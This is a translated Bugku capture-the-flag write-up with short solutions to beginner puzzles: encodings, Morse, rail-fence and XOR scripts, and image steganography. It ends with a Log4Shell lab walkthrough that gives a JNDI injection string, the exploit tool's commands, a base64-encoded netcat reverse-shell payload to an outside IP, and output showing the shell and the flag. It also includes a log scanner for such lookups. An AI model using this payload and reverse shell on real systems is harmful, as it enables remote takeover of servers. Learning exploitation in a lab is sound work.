bugku: just playing around
date: Dec 27, 2022 02:41 AM
tags: Writeup, Website
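Miscopied characters
The teacher asked Xiao Ming to copy out a passage, but careless Xiao Ming copied some of the digits as letters and, being compulsive, also changed every letter to upper case. Can you help Xiao Ming restore it and work out the answer: QWIHBLGZZXJSXZNVBZW
The digits and letters that look alike are I(i)=>1, L(l)=>1, G(g)=>9, Z(z)=>2, S(s)=>5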
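The search this hint sets up, as an added example that is not part of the original write-up: every copied letter may originally have been upper case, lower case or a look-alike digit, and each 4-character base64 group can be tested on its own. The `ALLOWED` alphabet and the function names are assumptions made for this sketch.

```python
import base64
import itertools
import string

CIPHER = "QWIHBLGZZXJSXZNVBZW"  # string from the challenge text
LOOKALIKE = {"I": "1", "L": "1", "G": "9", "Z": "2", "S": "5"}  # table from the write-up
ALLOWED = set(string.ascii_letters + string.digits + "_")  # assumption: plaintext alphabet


def variants(ch):
    """A copied letter was originally upper case, lower case or a look-alike digit."""
    opts = {ch, ch.lower()}
    if ch in LOOKALIKE:
        opts.add(LOOKALIKE[ch])
    return sorted(opts)


def block_candidates(block):
    """Decode every variant of one base64 group; keep those that give allowed text."""
    pad = "=" * (-len(block) % 4)
    found = {}
    for combo in itertools.product(*(variants(c) for c in block)):
        text = "".join(combo)
        raw = base64.b64decode(text + pad)
        if all(chr(b) in ALLOWED for b in raw):
            found[raw.decode("ascii")] = text
    return found


def solve(cipher=CIPHER):
    """Return, for each 4-character group, a map of decoded text -> restored base64."""
    groups = [cipher[i:i + 4] for i in range(0, len(cipher), 4)]
    return [block_candidates(g) for g in groups]


if __name__ == "__main__":
    for group in solve():
        print(group)
```

Working group by group keeps the search to at most 81 variants per group instead of every combination over the whole 19-character string.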
/。-
..-./.-../.-/--./----.--/-../...--/..-./-.-./-.../..-./.----/--.../..-./----./...--/----./----./...../-----/....-/-----.-
Hmm
Not a Bacon cipher
And for Morse there are extra symbols
..-. .-.. .- --. ----.-- -.. ...-- ..-. -.-. -... ..-. .---- --... ..-. ----. ...-- ----. ----. ..... ----- ....- -----.-

The clever lamb
A lamb jumped over 2 fences fa{fe13f590lg6d46d0d0}

ok

Apparently there are only three kinds
A pointless challenge, zero practical value

Trap the pig in the pigpen

/9j/ isn't that an image?

Confirmed, save it as a file
And what is this now

That's all
telnet
Beginner level

Seeing is not believing

What is all this
A docx is essentially a zip archive

ping

It's all ICMP
Could it be about finding the ones that got a reply
Overthinking it


sogo

How you pick it out is up to you
Linux2
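Nothing much, just separate it out

This is a decoy
Such a large file and only one image??
strings brave |more

The strings command looks for printable strings in an object file or binary file. A string is any sequence of 4 or more printable characters that ends with a newline or a null character. The strings command is useful for identifying random object files.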
Intro to reversing


Column mode, regex

Easy_Re Reverse
Search using the keywords from the challenge title

Clear the game Reverse


Try another one


# py -3
# coding:utf-8
array1 = [18,64,98,5,2,4,6,3,6,48,49,65,32,12,48,65,31,78,62,32,49,32,1,57,96,3,21,9,4,62,3,5,4,1,2,3,44,65,78,32,16,97,54,16,44,52,32,64,89,45,32,65,15,34,18,16,0]
array2 = [123,32,18,98,119,108,65,41,124,80,125,38,124,111,74,49,83,108,94,108,84,6,96,83,44,121,104,110,32,95,117,101,99,123,127,119,96,48,107,71,92,29,81,107,90,85,64,12,43,76,86,13,114,1,117,126,0]
flag = ''
# each flag byte is array1[i] XOR array2[i] XOR 0x13
for i in range(len(array1)):
    flag += chr(array1[i] ^ array2[i] ^ 0x13)
print(flag)
Easy_vb Reverse
MCTF{N3t_Rev_1s_E4ay}

love



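Brief notes

import base64
s = "e3nifIH9b_C@n@dH"
flag = ""
# undo the per-index offset: character i was shifted up by i
for i in range(len(s)):
    flag += chr(ord(s[i]) - i)
# what remains is base64
flag = base64.b64decode(flag)
print(flag)
Decrypt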
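Teacher Ma's antivirus guard


def enFence(string, space):
    # row i of the fence takes every space-th character starting at index i
    s = ""
    for i in range(0, space):
        for j in range(i, len(string), space):
            s += string[j]
    print(s)
    return s

def deFence(string, space):
    # cut the ciphertext back into its rows; when len(string) is not a
    # multiple of space the rows differ in length, so measure each one
    rows = []
    pos = 0
    for i in range(0, space):
        size = len(range(i, len(string), space))
        rows.append(string[pos:pos + size])
        pos += size
    # read the rows back column by column
    s = ""
    for j in range(0, len(rows[0])):
        for row in rows:
            # stay in bounds
            if j < len(row):
                s += row[j]
    print(s)
    return s

deFence("fgaag_!l{_oun}amb_ob", 3)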
NoString

s = "oehnl3r=<?=hF@CCGPt"
f = "yelhzl)`gy|})|)oehnl3"
flag = ""
# every character is XORed with 9
for i in s:
    flag = flag + chr(ord(i) ^ 9)
    print(chr(ord(i) ^ 9))
print(flag)
This is just a plain picture


There is some odd code
Copy it out

Steganography

exiftool 2.png
ExifTool Version Number : 12.30
File Name : 2.png
Directory : .
File Size : 17 KiB
File Modification Date/Time : 2017:06:07 22:26:44+08:00
File Access Date/Time : 2021:12:12 18:02:12+08:00
File Inode Change Date/Time : 2021:12:12 18:02:11+08:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 500
Image Height : 420
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Pixels Per Unit X : 4724
Pixels Per Unit Y : 4724
Pixel Units : meters
Profile Name : Photoshop ICC profile
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
White Point X : 0.31269
White Point Y : 0.32899
Red X : 0.63999
Red Y : 0.33001
Green X : 0.3
Green Y : 0.6
Blue X : 0.15
Blue Y : 0.05999
Image Size : 500x420
Megapixels : 0.210
Image Width : 500
Image Height : 420
Pixels Per Unit X : 4724
Pixels Per Unit Y : 4724
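The information does not match
Modify it and save


Cyberpunk

Something is wrong with the Java environment
Stegsolve does not display everything
pass
Bassist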


5+58==327a6c4304ad5938eaf0efb6cc3e53dcCFmZknmK3SDEcMEue1wrsJdqqkt7dXLuS


Be careful when solving -1

log4j
${jndi:ldap://cztlh5.dnslog.cn/exp}


Vulnerable
git clone https://github.com/black9/Log4shell_JNDIExploit.git
unzip log4j.zip
# enter the directory
cd log4j/
java -jar *.jar -i 114.114.114.114 -p 8080
# start an nc listener on port 12345
nc -lvn 12345
${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/[base64-encoded command]}

The runtime also has to be installed
apt install default-jre
${jndi:ldap://102.223.75.148:1389/Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==}

➜ Log4shell_JNDIExploit git:(main) ✗ java -jar *.jar -i 102.223.75.148 -p 8080
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...
[+] Received LDAP Query: Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==
[+] Paylaod: command
[+] Command: nc 102.223.75.148 12345 -e /bin/sh
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA== with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA== redirecting to http://102.223.75.148:8080/ExploitWyWFTkcVxR.class
[+] New HTTP Request From /114.67.175.224:46900 /ExploitWyWFTkcVxR.class
[+] Receive ClassRequest: ExploitWyWFTkcVxR.class
[+] Response Code: 200
[+] Received LDAP Query: Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==
➜ ~ nc -lvnp 12345
listening on [any] 12345 ...
connect to [102.223.75.148] from (UNKNOWN) [114.67.175.224] 42381
ls
bin
dev
etc
flag
home
lib
linuxrc
media
mnt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
cat flag
flag{60f59ffe0f15aad3d9e544fbef142349}
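The same traffic seen from the log side, as an added example that is not part of the original write-up: a small scanner that finds the plain `${jndi:...}` lookup form shown above in request logs and decodes the `Basic/Command/Base64/` path so the requested command is visible during triage. The log lines, hosts and function names are constructed for this sketch.

```python
import base64
import re
from urllib.parse import unquote

# Matches the plain lookup form shown in this write-up: ${jndi:scheme://host[:port]/path}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)"
    r"(?::(?P<port>\d+))?/(?P<path>[^}\s]*)\}",
    re.I,
)
B64_CMD_PREFIX = "Basic/Command/Base64/"  # path layout seen in the tool output above


def find_jndi(line):
    """Return one dict per JNDI lookup found in a (possibly URL-encoded) log line."""
    hits = []
    for m in JNDI_RE.finditer(unquote(line)):
        hit = {
            "scheme": m["scheme"].lower(),
            "host": m["host"],
            "port": int(m["port"]) if m["port"] else None,
            "path": m["path"],
            "command": None,
        }
        if m["path"].startswith(B64_CMD_PREFIX):
            blob = m["path"][len(B64_CMD_PREFIX):]
            try:
                hit["command"] = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
            except ValueError:
                pass  # not valid base64: leave command unset for manual review
        hits.append(hit)
    return hits


# Constructed access-log lines; 192.0.2.0/24, 198.51.100.0/24 and .test are reserved for documentation.
SAMPLE_LOG = [
    '198.51.100.7 - - "GET /?q=hello HTTP/1.1" 200',
    '198.51.100.7 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fprobe.example.test%2Fexp%7D HTTP/1.1" 200',
    '198.51.100.7 - - "POST /login user=${jndi:ldap://192.0.2.10:1389/Basic/Command/Base64/aWQ=} HTTP/1.1" 200',
]


def scan(lines):
    """Return (line_number, hit) pairs for every lookup found."""
    return [(n, hit) for n, line in enumerate(lines, 1) for hit in find_jndi(line)]


if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG):
        print(n, hit)
```

The callback host and port it extracts are the values to check against outbound LDAP and HTTP connections from the application host.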